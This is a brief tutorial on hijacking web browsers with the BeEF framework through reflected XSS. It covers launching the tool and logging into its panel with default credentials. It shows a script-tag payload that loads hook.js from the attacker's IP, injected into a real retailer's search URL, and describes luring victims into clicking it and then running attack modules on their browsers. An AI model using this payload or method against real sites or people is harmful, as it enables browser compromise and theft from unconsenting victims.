Browser Hijacking with BeEF Framework

BeEF ( The Browser Exploitation Framework ) is a tool that performs security tests on the web browser. Beef  makes a client-based attack and just focused to browser. You can find detailed information here( http://beefproject.com/ ).
Beef is based on kali linux  and parrot.  You can look at how it is set up in other system (https://github.com/beefproject/beef/wiki/Installation).

Now let’s look at the use of the Beef Framework with the Reflected XSS attack. Firstly let’s run the beef from the terminal. You can also run it from the Applications> Exploitation>Beef Xss Framework  tab. ( I will do it on Parrot Sec. OS)

With the  cd  /usr/share/beef-xss  command we come to the directory where the beef is found and  we run beef with the command  ./beef .

And we log in panel with this url :

http://127.0.0.1:3000/ui/panel

(  Default username: beef, password : beef  )

When we look at the Beef interface; we can see online and offline victim in left side. Now  we find a victim with using Reflected XSS. We can do this in 2 ways:

  1. We can add a script to url to we found xss vulnerability on any website. Let’s say this site has a xss vulnerability we can add this script on URL;
http://alibaba.com/search.php?searchitem=laptop
http://alibaba.com/search.php?searchitem=<script src="https:// My IP /hook.js"></script>

We are trying to victim click on the URL..

2. Beef have a wonderful default pages( demos/bucther/index.html )

This public access will not be provided .( You need to do extra processing to do this. External ip routing, modem settings, port opening, etc… You can risk your safety. ) But may work on the local network.

If victim clicked our link we will see in the left side.
We can find the important information about the victim from Details tab and  we can look at victim log from Logs tab. We will using many client-based attacks  from Commands tab.

There are many commands on this tab. We can look at command status and use it.

Now let’s make a simple joke:

Screen output:

 

You can use in many  cliend-based attack modules in BeEF Framework.
( https://github.com/beefproject/beef/tree/master/modules )